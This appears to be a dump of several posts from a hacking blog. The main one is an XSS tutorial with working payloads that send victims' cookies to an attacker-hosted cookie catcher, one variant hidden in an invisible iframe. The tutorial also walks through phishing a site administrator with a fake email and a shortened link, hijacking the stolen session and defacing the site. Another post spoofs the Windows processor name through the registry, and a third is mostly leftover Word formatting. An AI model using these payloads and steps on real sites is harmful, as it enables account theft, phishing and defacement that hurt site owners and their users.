tag:blogger.com,1999:blog-2897447295594141612024-02-19T22:32:41.594-08:00Hacking | SkilzHacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.comBlogger71125tag:blogger.com,1999:blog-289744729559414161.post-10030626258198251052011-10-06T00:07:00.000-07:002011-10-06T00:21:13.515-07:00How to change the processor name<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk-JiLYFx_4Y1Fokdwi4kC71tXZizjfxi9b6yb9NRvFKfJy-7NDdsPKsFdfmLmNe_-FDWCNF7RPJ3xhgltHmxVwmYjJkXaKtI6PQwBFUdC-lfyHIbc6EiOequd8YQJa0ryg0bgsDwu1y0/s1600/processor.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk-JiLYFx_4Y1Fokdwi4kC71tXZizjfxi9b6yb9NRvFKfJy-7NDdsPKsFdfmLmNe_-FDWCNF7RPJ3xhgltHmxVwmYjJkXaKtI6PQwBFUdC-lfyHIbc6EiOequd8YQJa0ryg0bgsDwu1y0/s320/processor.jpg" width="320" /></a></div><br />
<br />
<br />
Hello friends .......today i gonna show you that how can you change your processor name with the help of the registry editor.....<br />
<br />
Steps - Open the notepad ....and type the following bold and underlined text....and save it as ....anyfilename.reg<br />
<br />
here please check the extention to .reg file .......<br />
<br />
<br />
<u><b>Windows Registry Editor Version 5.00<br />
<br />
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]<br />
"Component Information"=hex:00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00<br />
"Identifier"="x86 Family 15 Model 1 Stepping 3"<br />
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00<br />
"ProcessorNameString"=" AMD(R) ATHLON 64 BIT FX 8.70GHz"<br />
"VendorIdentifier"="GenuineIntel"<br />
"FeatureSet"=dword:00073fff<br />
"~MHz"=dword:000006a3<br />
"Update Signature"=hex:00,00,00,00,04,00,00,00<br />
"Update Status"=dword:00000002</b></u><br />
<u><b></b></u><br />
<u><b></b></u><br />
<u><b></b></u><br />
<u><b></b></u><br />
<u><b></b></u><br />
<u><b></b></u><br />
<u><b></b></u><br />
<u><b><br />
</b></u>thanks/.....for reading this .....</div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com6tag:blogger.com,1999:blog-289744729559414161.post-60142242773721530212011-07-17T10:20:00.000-07:002011-07-17T10:20:56.673-07:00XSS Tutorial<span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: red;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhALY9Y3N4Tq6tU7tIK0oo0Urz2C6G4gkLANGW3EhR2Ro4q-uUw2wQfOuzWfqfIL0R4JRdaJXrkmrb2Q7HwOLO50aswMCnZMkaoo-ex-izpMahYkv72PgRG__pJa9LoLnju8PCUWF5Uovs/s1600/xss-attack.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhALY9Y3N4Tq6tU7tIK0oo0Urz2C6G4gkLANGW3EhR2Ro4q-uUw2wQfOuzWfqfIL0R4JRdaJXrkmrb2Q7HwOLO50aswMCnZMkaoo-ex-izpMahYkv72PgRG__pJa9LoLnju8PCUWF5Uovs/s320/xss-attack.jpg" width="320" /></a></div><div style="text-align: center;"></div></span></span><br />
</span><br />
<span style="font-weight: bold;"></span><br />
<span style="font-weight: bold;"></span><br />
<span style="font-weight: bold;"></span><br />
<span style="font-weight: bold;"></span><br />
<span style="font-weight: bold;"><br />
</span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-weight: bold;">Hello Guys Today i will write a Complete Tutorial on XSS.<br />
<br />
First Of All XSS is in 2 Types, Persistent and Non-Persistent type.<br />
<br />
For XSS we will use something called a Cookie Catcher.<br />
Question will be that why we would need someones else cookies?<br />
<br />
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking.<br />
<br />
First go to a free hosting site like <a href="http://www.110mb.com/" target="_blank">http://www.110mb.com</a> or any other php hosting sites and register there. Then download this cookie catcher and upload it.<br />
<br />
<span style="color: red;">Cookie Catcher</span>: <a href="http://adf.ly/1I5oz" target="_blank">http://adf.ly/1I5oz</a><br />
<br />
What does the cookie catcher do?<br />
It grabs the user's:<ul><li>Cookies</li>
<li>IP</li>
<li>Referral Link. Which Page is attached to that Link</li>
<li>Time And Date<br />
</li>
</ul><br />
<span style="font-size: medium;"><span style="color: red;">Get Vulnerable sites</span></span>:<br />
<br />
Ok first we need sites that are vulnerable to XSS so it will work on them.<br />
To test it we will need to add a code after the link.<br />
I will use this site that many of you probably saw it before.<br />
<a href="http://adf.ly/Tdo3" target="_blank">http://adf.ly/Tdo3</a><br />
<br />
Now for testing If a site is vulnerable or not you can add these codes:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><script>alert(document.cookie)</script></code></div></div><br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>'><script>alert(document.cookie)</script></code></div></div><br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><script>alert("Test")</script></code></div></div><br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>'><script>alert("Test")</script></code></div></div><br />
Or a new one which i found out myself in which you can inject HTML:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><body bgcolor="FF0000"></body></code></div></div><br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe></code></div></div><br />
Then if we see a java script popup like this:<br />
<br />
<div><div class="spoiler_header">Spoiler <a href="">(Click to View)</a></div><div class="spoiler_body" style="display: none;"> <br />
<img alt="[Image: i83028_popup.bmp]" border="0" src="http://016.img98.net/out.php/i83028_popup.bmp" /></div></div><br />
Or if you used my testing and you saw the page's background go black or a page of google opens in that site it means its vulnerable to XSS attack.<br />
<br />
In the end, if your site is <a href="http://www.example.com/" target="_blank">http://www.example.com</a><br />
The link to test it would be: <a href="http://www.example.com/index.php?id=" target="_blank">http://www.example.com/index.php?id=</a>"><script>alert(document.cookie)</script><br />
<br />
<span style="font-size: medium;"><span style="color: red;">Persistent XSS</span>:</span><br />
<br />
In this method we will grab the slave's cookies with no suspection and completely stealth.<br />
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.<br />
Ok now lets go to this site: <a href="http://adf.ly/1I6ns" target="_blank">http://adf.ly/1I6ns</a><br />
Now test and see if the XSS vulnerable test work on it.<br />
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type or submit it, add this:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script></code></div></div><br />
and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???<br />
so they wont suspect you.<br />
<br />
Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: <a href="http://www.example.com/cookie" target="_blank">http://www.example.com/cookie</a> catcher.php<br />
The container of the cookies would be: <a href="http://www.example.com/cookies.html" target="_blank">http://www.example.com/cookies.html</a><br />
<br />
Now visit cookies.html and you would see the session of that cookie!<br />
<br />
Now there is another way for a cookie grabbing drive by, add this code and post it:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code><iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe></code></div></div><br />
Then post it in the forum or the comment box.<br />
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a<br />
<br />
<span style="color: red;"><iframe src="www.google.com"></iframe></span> and you will understand iframes more Smile<br />
<br />
ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.<br />
<br />
<span style="font-size: medium;"><span style="color: red;">Non-Persistent XSS</span>:</span><br />
<br />
Ok in this method we will make the slave admin go to our link. First we will pick a XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code><script>alert(document.cookie)</script></code></div></div><br />
And click the search button. If you see a javascript popup means its vulnerable to Non-Persistent XSS attack. Ok now we will do something similar.<br />
I will use this link for this method: <a href="http://adf.ly/1I6ns" target="_blank">http://adf.ly/1I6ns</a><br />
Now in front of the search.php?search= add this:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script></code></div></div><br />
Now go to <a href="http://www.spam.com/" target="_blank">http://www.spam.com</a> and shrink the whole page's link. Try to find a site administrator's E-mail in that vulnerable website and send a Fake Mail from a online fake mailer like this one: <a href="http://adf.ly/1I73J" target="_blank">http://adf.ly/1I73J</a><br />
<br />
<span style="color: red;">Now in the body just tell something fake like</span>: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the spam will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.<br />
<br />
<span style="font-size: medium;"><span style="color: red;">Session Hijacking</span>:</span><br />
<br />
Ok now you have the Admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note open Notepad. The <span style="color: red;">;</span> separates cookies from each other so first copy the code before the <span style="color: red;">;</span> .<br />
Now go in that vulnerable website and clear the link. Instead of that link add this:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Javascript:void(document.cookie="")</code></div></div><br />
or for an example:<br />
<br />
<div class="codeblock"> <div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")</code></div></div><br />
Then visit the link. Do this with all of the cookies and refresh the page. And you are logged in as administrator.<br />
So now go in your Admin Panel and upload your Deface Page.<br />
<br />
Good Luck. Now you have Hacked a Website with XSS.<br />
</span>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-25752346406981894202011-07-17T00:45:00.000-07:002011-07-17T00:45:12.203-07:00High Compression 4GB DVD to 100MB File<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcxLPtI5HPnsEBs15fe5dbMdfz7dmW1wLkM54qXpLbojT-LGm-o4MGD-Ieyo6DLdWER5Bs79uAH0Ofw1nbfZDp3ISefTxAmJmUnScK51Tp-3o3VpcPvo0FYSYapQyey9RDHcUA-qCiVOU/s1600/funnel-file-compression.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcxLPtI5HPnsEBs15fe5dbMdfz7dmW1wLkM54qXpLbojT-LGm-o4MGD-Ieyo6DLdWER5Bs79uAH0Ofw1nbfZDp3ISefTxAmJmUnScK51Tp-3o3VpcPvo0FYSYapQyey9RDHcUA-qCiVOU/s320/funnel-file-compression.jpg" width="192" /></a></div><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:AllowPNG/> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:EnableOpenTypeKerning/> <w:DontFlipMirrorIndents/> <w:OverrideTableStyleHps/> <w:UseFELayout/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><br />
